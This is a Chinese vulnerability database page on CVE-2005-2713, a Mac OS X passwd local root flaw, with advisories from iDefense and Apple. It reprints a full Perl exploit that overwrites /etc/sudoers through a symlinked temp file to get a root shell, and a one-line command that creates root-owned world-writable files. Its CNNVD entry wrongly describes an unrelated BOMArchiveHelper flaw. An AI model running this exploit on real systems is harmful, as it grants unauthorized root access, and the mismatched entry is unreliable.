CVE-2005-2713
CVSS6.8
发布时间 :2005-12-31 00:00:00
修订时间 :2011-04-12 00:00:00
NMCOEPS    

[原文]passwd in Directory Services in Mac OS X 10.3.x before 10.3.9 and 10.4.x before 10.4.5 allows local users to create arbitrary world-writable files as root by specifying an alternate file in the password database option.


[CNNVD]Apple MacOS X BOMArchiveHelper目录遍历漏洞(CNNVD-200512-801)

        Mac OS X是苹果家族计算机所使用的操作系统。
        Mac OS X的BOM框架负责解压某些类型的文档,这个框架的实现上存在目录遍历漏洞,攻击者可以将文件解压至当前用户可写的任意位置。

- CVSS (基础分值)

CVSS分值: 6.8 [中等(MEDIUM)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/o:apple:mac_os_x:10.3.9Apple Mac OS X 10.3.9
cpe:/o:apple:mac_os_x:10.3.1Apple Mac OS X 10.3.1
cpe:/o:apple:mac_os_x:10.4.2Apple Mac OS X 10.4.2
cpe:/o:apple:mac_os_x_server:10.4.4Apple Mac OS X Server 10.4.4
cpe:/o:apple:mac_os_x_server:10.3.5Apple Mac OS X Server 10.3.5
cpe:/o:apple:mac_os_x:10.4.1Apple Mac OS X 10.4.1
cpe:/o:apple:mac_os_x_server:10.4.1Apple Mac OS X Server 10.4.1
cpe:/o:apple:mac_os_x_server:10.4.3Apple Mac OS X Server 10.4.3
cpe:/o:apple:mac_os_x:10.3.3Apple Mac OS X 10.3.3
cpe:/o:apple:mac_os_x_server:10.4.2Apple Mac OS X Server 10.4.2
cpe:/o:apple:mac_os_x:10.4.5Apple Mac OS X 10.4.5
cpe:/o:apple:mac_os_x_server:10.4.5Apple Mac OS X Server 10.4.5
cpe:/o:apple:mac_os_x:10.4Apple Mac OS X 10.4
cpe:/o:apple:mac_os_x_server:10.3.3Apple Mac OS X Server 10.3.3
cpe:/o:apple:mac_os_x_server:10.3.4Apple Mac OS X Server 10.3.4
cpe:/o:apple:mac_os_x_server:10.4Apple Mac OS X Server 10.4
cpe:/o:apple:mac_os_x:10.3.6Apple Mac OS X 10.3.6
cpe:/o:apple:mac_os_x:10.3.2Apple Mac OS X 10.3.2
cpe:/o:apple:mac_os_x:10.3.8Apple Mac OS X 10.3.8
cpe:/o:apple:mac_os_x_server:10.3.1Apple Mac OS X Server 10.3.1
cpe:/o:apple:mac_os_x:10.3.4Apple Mac OS X 10.3.4
cpe:/o:apple:mac_os_x_server:10.3.2Apple Mac OS X Server 10.3.2
cpe:/o:apple:mac_os_x_server:10.3Apple Mac OS X Server 10.3
cpe:/o:apple:mac_os_x:10.3.7Apple Mac OS X 10.3.7
cpe:/o:apple:mac_os_x_server:10.3.8Apple Mac OS X Server 10.3.8
cpe:/o:apple:mac_os_x:10.3.5Apple Mac OS X 10.3.5
cpe:/o:apple:mac_os_x:10.3Apple Mac OS X 10.3
cpe:/o:apple:mac_os_x_server:10.3.7Apple Mac OS X Server 10.3.7
cpe:/o:apple:mac_os_x:10.4.3Apple Mac OS X 10.4.3
cpe:/o:apple:mac_os_x_server:10.3.6Apple Mac OS X Server 10.3.6
cpe:/o:apple:mac_os_x_server:10.3.9Apple Mac OS X Server 10.3.9
cpe:/o:apple:mac_os_x:10.4.4Apple Mac OS X 10.4.4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2713
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2713
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-801
(官方数据源) CNNVD

- 其它链接及资源

http://www.us-cert.gov/cas/techalerts/TA06-062A.html
(UNKNOWN)  CERT  TA06-062A
http://www.securityfocus.com/bid/16910
(PATCH)  BID  16910
http://www.securityfocus.com/bid/16907
(VENDOR_ADVISORY)  BID  16907
http://secunia.com/advisories/19064
(VENDOR_ADVISORY)  SECUNIA  19064
http://lists.apple.com/archives/security-announce/2006/Mar/msg00000.html
(VENDOR_ADVISORY)  APPLE  APPLE-SA-2006-03-01
http://xforce.iss.net/xforce/xfdb/25272
(UNKNOWN)  XF  macosx-passwd-file-create(25272)
http://www.vupen.com/english/advisories/2006/0791
(VENDOR_ADVISORY)  VUPEN  ADV-2006-0791
http://www.securityfocus.com/archive/1/archive/1/426535/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060302 [OSX]: /usr/bin/passwd local root exploit.
http://www.osvdb.org/23646
(UNKNOWN)  OSVDB  23646
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=400
(UNKNOWN)  IDEFENSE  20060302 Apple Mac OS X passwd Arbitrary Binary File Creation/Modification
http://docs.info.apple.com/article.html?artnum=303382
(UNKNOWN)  CONFIRM  http://docs.info.apple.com/article.html?artnum=303382

- 漏洞信息

Apple MacOS X BOMArchiveHelper目录遍历漏洞
中危 资料不足
2005-12-31 00:00:00 2006-05-15 00:00:00
远程※本地  
        Mac OS X是苹果家族计算机所使用的操作系统。
        Mac OS X的BOM框架负责解压某些类型的文档,这个框架的实现上存在目录遍历漏洞,攻击者可以将文件解压至当前用户可写的任意位置。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty1.pl/product=09818&cat=1&platform=osx&method=sa/SecUpd2006-001Ti.dmg

- 漏洞信息 (1545)

Apple Mac OS X (/usr/bin/passwd) Custom Passwd Local Root Exploit (EDBID:1545)
osX local
2006-03-01 Verified
0 vade79
N/A [点击下载]
#!/usr/bin/perl
#
# /usr/bin/passwd[OSX]: local root exploit.
# 
# by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)
# 
# (Apple) OSX's /usr/bin/passwd program has support for a custom
# passwd file to be used instead of the standard/static path.  this
# feature has security issues in the form of editable file(s) being
# made anywheres on the disk and also writing arbitrary data to files.
#
# the first issue will only work if the file does not already exist,
# it is done using "umask 0;/usr/bin/passwd -i file -l <filename>".
# the second issue is once a successful password change has occured
# /usr/bin/passwd will insecurely re-write the passwd file to
# /tmp/.pwtmp.<pid>, which can be predicted and linked to a file of
# your choice. (this exploits the second issue to overwrite 
# /etc/sudoers)
#
# (for some reason this took apple 6 or so months to patch)

use POSIX;

$fake_passwd="/tmp/xpasswd.$$";
$passwd_pid=($$ + 1);
$passwd_tempfile="/tmp/.pwtmp.$passwd_pid";
$sudoers="/etc/sudoers";

sub pexit{print("[!] @_.\n");exit(1);}
print("[*] /usr/bin/passwd[OSX]: local root exploit.\n");
print("[*] by: vade79/v9 v9\@fakehalo.us (fakehalo/realhalo)\n\n");
unlink($fake_passwd);
print("[*] making fake password file. ($fake_passwd)\n");
open(FP,">$fake_passwd")||pexit("couldn't open/write to $fake_passwd");
# uid must equal the current user.
print(FP "ALL ALL=(ALL) ALL #::" . getuid . ":" . getuid . "::" .
getuid . ":" . getuid . "::/:/\n");
close(FP);
print("[*] sym-linking $sudoers -> $passwd_tempfile.\n");
symlink($sudoers,$passwd_tempfile)||pexit("couldn't link files.");
print("[*] running /usr/bin/passwd on $fake_passwd.\n");
print("[*] (use ANY password longer than 4 characters)\n\n");
system("/usr/bin/passwd -i file -l $fake_passwd \"ALL ALL=(ALL) ALL #\"");
print("\n[*] running \"sudo sh\", use your REAL (user) password.\n\n");
system("/usr/bin/sudo sh");
exit(0);

# milw0rm.com [2006-03-01]
		

- 漏洞信息 (F44339)

iDEFENSE Security Advisory 2006-03-02.2 (PacketStormID:F44339)
2006-03-03 00:00:00
vade79,iDefense Labs  idefense.com
advisory,arbitrary,local
apple,osx
CVE-2005-2713,CVE-2005-2714
[点击下载]

iDefense Security Advisory 03.02.06 - Local exploitation of a design error in version 10.3.9 of Apple Computer Inc.'s Mac OS X could allow arbitrary files to be overwritten with user supplied contents. iDefense has confirmed the existence of this vulnerability in Mac OS X Version 10.3.9. In addition, the following versions been confirmed by the vendor to be vulnerable: Mac OS X Server Version 10.3.9, Mac OS X Version 10.4.5, Mac OS X Server Version 10.4.5.

Apple Mac OS X passwd Arbitrary Binary File Creation/Modification

iDefense Security Advisory 03.02.06
http://www.idefense.com/application/poi/display?type=vulnerabilities
March 02, 2006

I. BACKGROUND

Mac OS X is an operating system for the Apple family of microcomputers.
More information is available at the following link:

    http://www.apple.com/macosx/

II. DESCRIPTION

Local exploitation of a design error in version 10.3.9 of Apple Computer
Inc.'s Mac OS X could allow arbitrary files to be overwritten with user
supplied contents.

The /usr/bin/passwd binary is a setuid application which allows users to
change their password. There are two related vulnerabilities.

The first vulnerability occurs because the Mac OS X version of the
passwd utility accepts options specifying which password database to
operate on. The passwd binary does not check that the user has
permissions to create a file in the location specified and does not set
the created file permissions. By setting the file creation mask to 0 a
user can create arbitrary files owned by root, with permissions which
allow any user to change the contents.

The second vulnerability exists in the insecure creation of temporary
files with predictable names. The temporary filename created by the
process is in the form /tmp/.pwtmp.<pid> where <pid> is the process id
of the passwd process. By creating a symbolic link to the target file,
and then changing the password, it is possible to put controllable
contents into the target file.

III. ANALYSIS

Successful exploitation of either of these vulnerabilities would allow a
local attacker to gain elevated privileges in a number of ways.

In the case of the first vulnerability, a new file could be created in
the  /etc directory, such as etc/rc.local_tuning, which is sourced if it
exists during the system start up process as the root user.

The second vulnerability would allow an attacker overwrite a file with
user controlled contents. This can be leveraged to provide privilege
escalation by, for example, creating a new /etc/sudoers file.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Mac OS X
Version 10.3.9. In addition, the following versions been confirmed by
the vendor to  be vulnerable:

 * Mac OS X Server Version 10.3.9
 * Mac OS X Version 10.4.5
 * Mac OS X Server Version 10.4.5
 
It is suspected that all prior releases are vulnerable.

V. WORKAROUND

Remove the setuid bit from the /usr/bin/passwd binary by executing the
following command as root:

  chmod -s /usr/bin/passwd

This workaround will prevent non-root users from being able to change
their password.

VI. VENDOR RESPONSE

Apple have released an update for this vulnerability, details of which
are available at the following location:

    http://docs.info.apple.com/article.html?artnum=61798

Apple security updates are available via the Software Update mechanism:

    http://docs.info.apple.com/article.html?artnum=106704
   
Apple security updates are also available for manual download:

    http://www.apple.com/support/downloads

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
following names to these issues:

   CVE-2005-2713 - passwd file creation and permissions

   CVE-2005-2714 - temporary file symlink problem

VIII. DISCLOSURE TIMELINE

08/23/2005  Initial vendor notification
08/27/2005  Initial vendor response
03/02/2006  Coordinated public disclosure

IX. CREDIT

Discovery of these vulnerabilities are credited to vade79.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright (c) 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
    

- 漏洞信息 (F44321)

Apple Security Advisory 2006-03-01 (PacketStormID:F44321)
2006-03-03 00:00:00
Apple  apple.com
advisory,perl,vulnerability
apple,osx
CVE-2005-3319,CVE-2005-3353,CVE-2005-3391,CVE-2005-3392,CVE-2006-0384,CVE-2006-0391,CVE-2005-2713,CVE-2005-2714,CVE-2006-0386,CVE-2006-0383,CVE-2005-3706,CVE-2006-0395,CVE-2005-4217,CVE-2005-3712,CVE-2005-4504,CVE-2006-0387,CVE-2006-0388,CVE-2006-0394
[点击下载]

APPLE-SA-2006-03-01 Security Update 2006-001 - A new update has been released for Mac OS X that addresses vulnerabilities in apache_mod_php, automount, COM, Directory Services, FileVault, IPSec, LibSystem, Mail, perl, rsync, Safari, LaunchServices, and Syndication.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

APPLE-SA-2006-03-01 Security Update 2006-001

Security Update 2006-001 is now available and addresses the following
issues:

apache_mod_php
CVE-ID:  CVE-2005-3319, CVE-2005-3353, CVE-2005-3391, CVE-2005-3392
Available for:  Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X
v10.4.5, Mac OS X Server v10.4.5
Impact:  Multiple security issues in PHP 4.4
Description:  PHP 4.4.1 fixes several security issues in the Apache
module and scripting environment. Details of the fixes are
available via the PHP web site (www.php.net). PHP ships with Mac OS
X but is disabled by default.

automount
CVE-ID:  CVE-2006-0384
Available for:  Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X
v10.4.5, Mac OS X Server v10.4.5
Impact:  Malicious network servers may cause a denial of service or
arbitrary code execution
Description:  File servers on the local network may be able to cause
Mac OS X systems to mount file systems with reserved names. This
could cause the systems to become unresponsive, or possibly allow
arbitrary code delivered from the file servers to run on the target
system.

BOM
CVE-ID:  CVE-2006-0391
Available for:  Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X
v10.4.5, Mac OS X Server v10.4.5
Impact:  Directory traversal may occur while unpacking archives with
BOM
Description:  The BOM framework handles the unpacking of certain
types of archives. This framework is vulnerable to a directory
traversal attack that can allow archived files to be unpacked into
arbitrary locations that are writable by the current user. This
update addresses the issue by properly sanitizing those paths.
Credit to Stephane Kardas of CERTA for reporting this issue.

Directory Services
CVE-ID:  CVE-2005-2713, CVE-2005-2714
Available for:  Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X
v10.4.5, Mac OS X Server v10.4.5
Impact:  Malicious local users may create and manipulate files as
root
Description:  The passwd program is vulnerable to temporary file
attacks. This could lead to privilege elevation. This update
addresses the issue by anticipating a hostile environment and by
creating temporary files securely. Credit to Ilja van Sprundel of
Suresec LTD, vade79, and iDefense (idefense.com) for reporting this
issue.

FileVault
CVE-ID:  CVE-2006-0386
Available for:  Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X
v10.4.5, Mac OS X Server v10.4.5
Impact:  FileVault may permit access to files during when it is
first enabled
Description:  User directories are mounted in an unsafe fashion when
a FileVault image is created. This update secures the method in
which a FileVault image is created.

IPSec
CVE-ID:  CVE-2006-0383
Available for:  Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X
v10.4.5, Mac OS X Server v10.4.5
Impact:  Remote denial of service against VPN connections
Description:  Incorrect handling of error conditions for virtual
private networks based on IPSec may allow a remote attacker to
cause a service interruption. This update addresses the issues by
correctly handling the conditions that may cause crashes. Credit to
OUSPG from the University of Oulu, NISCC, and CERT-FI for
coordinating and reporting this issue.

LibSystem
CVE-ID:  CVE-2005-3706
Available for:  Mac OS X v10.4.5, Mac OS X Server v10.4.5
Impact:  Attackers may cause crashes or arbitrary code execution
depending upon the application
Description:  An attacker able to cause an application to make
requests for large amounts of memory may also be able to trigger a
heap buffer overflow. This could cause the targeted application to
crash or execute arbitrary code. This update addresses the issue by
correctly handling these memory requests. This issue does not
affect systems prior to Mac OS X v10.4. Credit to Neil Archibald of
Suresec LTD for reporting this issue.

Mail
CVE-ID:  CVE-2006-0395
Available for:  Mac OS X v10.4.5, Mac OS X Server v10.4.5
Impact:  Download Validation fails to warn about unsafe file types
Description:  In Mac OS X v10.4 Tiger, when an email attachment is
double-clicked in Mail, Download Validation is used to warn the
user if the file type is not "safe". Certain techniques can be used
to disguise the file's type so that Download Validation is
bypassed. This update addresses the issue by presenting Download
Validation with the entire file, providing more information for
Download Validation to detect unknown or unsafe file types in
attachments.

perl
CVE-ID:  CVE-2005-4217
Available for:  Mac OS X v10.3.9, Mac OS X Server v10.3.9
Impact:  Perl programs may fail to drop privileges
Description:  When a perl program running as root attempts to switch
to another user ID, the operation may fail without notification to
the program. This may cause a program to continue to run with root
privileges, assuming they have been dropped. This can cause
security issues in third-party tools. This update addresses the
issue by preventing such applications from continuing if the
operation fails. This issue does not affect Mac OS X v10.4 or later
systems. Credit to Jason Self for reporting this issue.

rsync
CVE-ID:  CVE-2005-3712
Available for:  Mac OS X v10.4.5, Mac OS X Server v10.4.5
Impact:  Authenticated users may cause an rsync server to crash or
execute arbitrary code
Description:  A heap-based buffer overflow may be triggered when the
rsync server is used with the flag that allows extended attributes
to be transferred. It may be possible for a malicious user with
access to an rsync server to cause denial of service or code
execution. This update addresses the problem by ensuring that the
destination buffer is large enough to hold the extended attributes.
This issue does not affect systems prior to Mac OS X v10.4. Credit
to Jan-Derk Bakker for reporting this issue.

Safari
CVE-ID:  CVE-2005-4504
Available for:  Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X
v10.4.5, Mac OS X Server v10.4.5
Impact:  Viewing a maliciously-crafted web page may result in
arbitrary code execution
Description:  A heap-based buffer overflow in WebKit's handling of
certain HTML could allow a malicious web site to cause a crash or
execute arbitrary code as the user viewing the site. This update
addresses the issue by preventing the condition causing the
overflow. Credit to Suresec LTD for reporting this issue.

Safari
CVE-ID:  CVE-2006-0387
Available for:  Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X
v10.4.5, Mac OS X Server v10.4.5
Impact:  Viewing a malicious web page may cause arbitrary code
execution
Description:  By preparing a web page including specially-crafted
JavaScript, an attacker may trigger a stack buffer overflow that
could lead to arbitrary code execution with the privileges of the
user. This update addresses the issue by performing additional
bounds checking.

Safari
CVE-ID:  CVE-2006-0388
Available for:  Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X
v10.4.5, Mac OS X Server v10.4.5
Impact:  Remote web sites can redirect to local resources, allowing
JavaScript to execute in the local domain
Description:  Safari's security model prevents remote resources from
causing redirection to local resources. An issue involving HTTP
redirection can cause the browser to access a local file, bypassing
certain restrictions. This update addresses the issue by preventing
cross-domain HTTP redirects.

Safari, LaunchServices
CVE-ID:  CVE-2006-0394
Available for:  Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X
v10.4.5, Mac OS X Server v10.4.5
Impact:  Viewing a malicious web site may result in arbitrary code
execution
Description:  It is possible to construct a file which appears to be
a safe file type, such as an image or movie, but is actually an
application. When the "Open `safe' files after downloading" option
is enabled in Safari's General preferences, visiting a malicious
web site may result in the automatic download and execution of such
a file. A proof-of-concept has been detected on public web sites
that demonstrates the automatic execution of shell scripts. This
update addresses the issue by performing additional download
validation so that the user is warned (in Mac OS X v10.4.5) or the
download is not automatically opened (in Mac OS X v10.3.9).

Syndication
CVE-ID:  CVE-2006-0389
Available for:  Mac OS X v10.4.5, Mac OS X Server v10.4.5
Impact:  Subscriptions to malicious RSS content can lead to
cross-site scripting
Description:  Syndication (Safari RSS) may allow JavaScript code
embedded in feeds to run within the context of the RSS reader
document, allowing malicious feeds to circumvent Safari's security
model. This update addresses the issue by properly removing
JavaScript code from feeds. Syndication is only available in Mac OS
X v10.4 and later.

The following security enhancements are also included in this update:

FileVault: AES-128 encrypted FileVault disk images are now created
with more restrictive operating system permissions. Credit to Eric
Hall of DarkArt Consulting Services for reporting this issue.

iChat: A malicious application named Leap.A that attempts to
propagate using iChat has been detected. With this update for Mac
OS X v10.4.5 and Mac OS X Server v10.4.5, iChat now uses Download
Validation to warn of unknown or unsafe file types during file
transfers.

Users should use caution when opening files that are obtained from
the network. Further information is available via:
http://docs.info.apple.com/article.html?artnum=108009

Security Update 2006-001 may be obtained from the Software Update
pane in System Preferences, or Apple's Software Downloads web site:
http://www.apple.com/support/downloads/

For Mac OS X v10.4.5 (PowerPC) and Mac OS X Server v10.4.5
The download file is named:  "SecUpd2006-001Ti.dmg"
Its SHA-1 digest is:  999b73a54951b4e0a7f873fecf75f92840e8b439

For Mac OS X v10.4.5 (Intel)
The download file is named:  "SecUpd2006-001Intel.dmg"
Its SHA-1 digest is:  473f94264876fa49fa15a8b6bb4bc30956502ad5

For Mac OS X v10.3.9
The download file is named:  "SecUpd2006-001Pan.dmg"
Its SHA-1 digest is:  b6a000d451a1b1696726ff60142fc3da08042433

For Mac OS X Server v10.3.9
The download file is named:  "SecUpdSrvr2006-001Pan.dmg"
Its SHA-1 digest is:  2299380d72a61eadcbd0a5c6f46c924600ff5a9c

Information will also be posted to the Apple Product Security
web site:
http://docs.info.apple.com/article.html?artnum=61798

This message is signed with Apple's Product Security PGP key,
and details are available at:
http://www.apple.com/support/security/pgp/

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.0.5 (Build 5050)

iQEVAwUBRAYYVoHaV5ucd/HdAQJQWggApQmizj2t3+/87Fqun66/HCEkFt2YhUoe
cmel0/KwJhWrk+LV+CYvixbDvKuGIjP8CWB9/s78YN93pOI5WcfyTKd07rEQYkT4
i8KPrM9QjdvgIjKd6O/VAOkzBc3DqV7KNVR2Hewa3jOigTm7Yxil9o/nZt1TLxAI
9TN0uduc13WHC8WE2N41I8MQ+VdGTX3ANZkfgR90lua4A2E1ab9kCN2qbg+E7Cus
SkwsKp0qSH7bl8v0/R6c1hsYG0T1RwSWU6arAEliqzrrIbCm0Yxtgwp/CYFWC46j
TQNCcppNgcr/pVPojACy8WFtQ3wEb6rJ4ZjH1C5nOem2EoCBh10WFw==
=1Ww0
-----END PGP SIGNATURE-----
    

- 漏洞信息

23646
Apple Mac OS X passwd Database Option Arbitrary File Creation
Local Access Required Other
Loss of Integrity
Exploit Public

- 漏洞描述

Mac OS X contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when the passwd command is used with the option to specify a database to operate on. The passwd command does not verify that the user has permission to create the specified file before proceeding, and may lead to a loss of integrity.

- 时间线

2006-02-28 2005-08-23
2006-03-22 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Apple has released a patch (2006-001) to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Apple Mac OS X Directory Services Passwd Privilege Escalation Vulnerabilities
Design Error 16910
No Yes
2006-03-01 12:00:00 2006-03-03 06:51:00
Reported by Ilja van Sprundel, vade79,, and iDefense.

- 受影响的程序版本

Apple Mac OS X Server 10.4.5
Apple Mac OS X Server 10.3.9
Apple Mac OS X 10.4.5
Apple Mac OS X 10.3.9

- 漏洞讨论


Apple Mac OS X 'passwd' creates temporary files in an insecure manner. This could allow a local attacker to elevate their privileges.

These issues were originally described in BID 16907 Apple Mac OS X Security Update 2006-001 Multiple Vulnerabilities.

- 漏洞利用


An exploit is not required.

To exploit the first issue, the attacker executes the following:

umask 0;/usr/bin/passwd -i file -l <filename>

where <filename> is the path and name of another file on the system.

The following code is available to exploit the second issue:

- 解决方案


Apple has released advisory APPLE-SA-2006-03-01 to address these and other issues. Please see the referenced advisory for further details.


Apple Mac OS X 10.3.9

Apple Mac OS X Server 10.3.9

Apple Mac OS X Server 10.4.5

Apple Mac OS X 10.4.5

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站